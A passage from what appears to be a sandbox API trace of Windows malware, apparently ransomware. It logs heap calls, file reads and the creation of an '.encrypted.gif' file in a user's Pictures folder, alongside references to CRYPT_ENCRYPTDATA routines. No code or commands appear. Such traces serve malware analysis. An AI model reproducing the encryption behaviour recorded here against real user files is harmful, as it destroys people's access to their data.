(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.892] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0")) returned 0x10 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\3q41yk8hnsn8x6d.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0040.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0040.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0040.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.894] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.894] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x1369, lpOverlapped=0x0) returned 1 [0040.896] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1369) returned 0x7c9968 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1369) returned 0xac2018 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0040.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.896] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1369) returned 0x7c9968 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.897] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1369) returned 0x7c9968 [0040.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0040.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0040.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1369) returned 0xac3390 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.899] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.899] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0040.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.899] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da278 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.900] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.900] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.901] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 